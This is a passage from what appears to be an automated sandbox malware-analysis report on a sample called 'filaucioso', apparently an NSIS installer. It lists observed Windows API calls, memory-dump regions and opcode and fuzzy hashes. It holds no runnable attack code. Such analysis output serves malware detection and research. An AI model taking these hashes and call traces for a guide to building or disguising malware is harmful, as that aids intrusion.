                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FileMove
                                                                        • String ID:
                                                                        • API String ID: 3562171763-0
                                                                        • Opcode ID: 9f9068d1795bd19251473c79ba25bf94ae9e3d59ef929ed5037379c8cd1db445
                                                                        • Instruction ID: 5e69c691d72f125c1fbeda27f988c68ecdf1fc059cbca8910fb345ac15d52cae
                                                                        • Opcode Fuzzy Hash: 9f9068d1795bd19251473c79ba25bf94ae9e3d59ef929ed5037379c8cd1db445
                                                                        • Instruction Fuzzy Hash: ECF03031604211A7CB11BBBA9F4DD5F2A649F46368B21427FF121B22D2D6BC8902966F
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D
                                                                          • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointerwsprintf
                                                                        • String ID:
                                                                        • API String ID: 327478801-0
                                                                        • Opcode ID: 0c79aae5b3eee94086af180aed8bd5da1d19f1ae9c626aedbb9b7459d44442b6
                                                                        • Instruction ID: b182adf31489e09453cd2335cf6310b8baddae2fb6a0e01cc8db6764b629a228
                                                                        • Opcode Fuzzy Hash: 0c79aae5b3eee94086af180aed8bd5da1d19f1ae9c626aedbb9b7459d44442b6
                                                                        • Instruction Fuzzy Hash: 9CE06DB1600215AAD702EBA4AE89CBE776CEB44318F10043BF100F00C1C67D49428A29
                                                                        APIs
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringWrite
                                                                        • String ID:
                                                                        • API String ID: 390214022-0
                                                                        • Opcode ID: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
                                                                        • Instruction ID: 00be3bb5cfe09e5788b1f0bae87ec1d7a9c2ea1fc05a431f2d4690520b5a9855
                                                                        • Opcode Fuzzy Hash: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
                                                                        • Instruction Fuzzy Hash: FEE04F31A007256BDB213EB25E8ED6F3669AB84744B16113FFA01BA2C2D9BC1C05C26D
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B3,00000000,00792100,000000FF,00792100,000000FF,000000FF,00000004,00000000), ref: 00405C41
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                        • Instruction ID: 0d4b5292934197368b0f45fab11a858534e2fa67ffcff62b5ec67f53c8c98dda
                                                                        • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                        • Instruction Fuzzy Hash: 2BE0E632214759ABDF506E959C00AEB776CEB05390F004436F915E2150D631E8519BA4
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031FD,00000000,00000000,0040304A,000000FF,00000004,00000000,00000000,00000000), ref: 00405C12
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                        • Instruction ID: 15bd5d27262360345a0b198e16330f5e3575b7202d491c56c7af192eda573772
                                                                        • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                        • Instruction Fuzzy Hash: C8E0EC3261876AABEF109E55AC00AEB7BACEB05760F004836FD15E3190D631E9619BA4
                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(6E3A404C,00000004,00000040,6E3A403C), ref: 6E3A293F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2063049847.000000006E3A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E3A0000, based on PE: true
                                                                        • Associated: 00000001.00000002.2063032692.000000006E3A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063063793.000000006E3A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063077518.000000006E3A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6e3a0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: de47dc3e7b2377cec687486688074270f6fa35fb0566421b43358f89f80b74a2
                                                                        • Instruction ID: b67dc99cd0a470394ccea1648180345ff6860eaae5a75928ba045992ec07c7aa
                                                                        • Opcode Fuzzy Hash: de47dc3e7b2377cec687486688074270f6fa35fb0566421b43358f89f80b74a2
                                                                        • Instruction Fuzzy Hash: 99F0ACB1508A40DECB60CF7C944470EBFE8F326354B2245EAE258D7241EB3458C6FB11
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405F01,?,?,?,?,00000002,Call), ref: 00405E97
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                        • Instruction ID: 4199424cdd911ade4eb2abdec76784ff09b2342150b3acef81222138bde116dc
                                                                        • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                        • Instruction Fuzzy Hash: B7D0EC32000609BBDF115F90DD05FAB371DEB08310F004826BE59A4090D6759520AB55
                                                                        APIs
                                                                        • ShowWindow.USER32(00010490), ref: 00401596
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: e9cc2bfb6666a38da3f8af72fc6e4fa1e7a90b5ce2f039f92a7749c1dc8846cd
                                                                        • Instruction ID: dd78d0217ab0626d0a7a3bfb5b7a36ba0d54d57a697f982decce5ead7147db90
                                                                        • Opcode Fuzzy Hash: e9cc2bfb6666a38da3f8af72fc6e4fa1e7a90b5ce2f039f92a7749c1dc8846cd
                                                                        • Instruction Fuzzy Hash: 64D0C766704114E7C602D6AD9A4559D639497D5355B304033E102B51E1D1BC460266DF
                                                                        APIs
                                                                        • SendMessageA.USER32(0001048A,00000000,00000000,00000000), ref: 004040D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                                        • Instruction ID: 4e90d0d88409270038b8e5dd21ed965c243834f72d7675745fce4010ef402404
                                                                        • Opcode Fuzzy Hash: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                                        • Instruction Fuzzy Hash: 90C09B717407017BFA20CB689D49F077794AB90700F14C4297351F50E5C674D410DA1C
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,00042BE4), ref: 0040320E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                        • Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
                                                                        • Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                        • Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D
                                                                        APIs
                                                                        • SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                                        • Instruction ID: f42b45c65ed6a3ee6e87ec929b41dfaaf359f69b17cd9f6c2b1881eba3545dd7
                                                                        • Opcode Fuzzy Hash: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                                        • Instruction Fuzzy Hash: 64B09235180A00AAEA114B00DE09F457A62A7A4701F008068B250240F1CAB200A1DB08
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403E79), ref: 004040A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
                                                                        • Instruction ID: 939548ffee5b58c9ca03ae204caad8327118cb5bb39276deea9dcfc8bbd505dc
                                                                        • Opcode Fuzzy Hash: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
                                                                        • Instruction Fuzzy Hash: 65A00176444101AFCA02AF50EF09D4ABF62ABA4705B22843AE695940368A364872FF1D
                                                                        APIs
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                          • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0), ref: 00405170
                                                                          • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll), ref: 00405182
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                          • Part of subcall function 0040568C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
                                                                          • Part of subcall function 0040568C: CloseHandle.KERNEL32(?), ref: 004056C2
                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00401F8D
                                                                          • Part of subcall function 004063FA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F43,?,?,?,?,?,?), ref: 0040640B
                                                                          • Part of subcall function 004063FA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040642D
                                                                          • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
